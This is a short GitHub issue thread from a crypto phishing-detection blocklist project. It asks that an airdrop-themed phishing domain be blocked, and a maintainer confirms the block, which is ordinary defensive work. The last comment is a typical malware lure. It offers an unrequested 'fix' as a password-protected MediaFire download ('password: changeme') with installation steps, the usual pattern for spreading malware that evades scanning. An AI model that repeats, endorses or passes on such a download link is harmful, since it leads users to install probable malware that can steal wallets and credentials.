### ISSUE TITLE
[Block Domain] https://airdrop.orderiiy.xyz/

### ISSUE THREAD

**Issue by ThonnyMiller** [MetaMask/eth-phishing-detect#79644]
**Domain:** https://airdrop.orderiiy.xyz/

- [x] I have checked to make sure that [there is not a duplicate issue](https://github.com/MetaMask/eth-phishing-detect/issues)

**Comment by samczsun** [comment]
Blocked

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
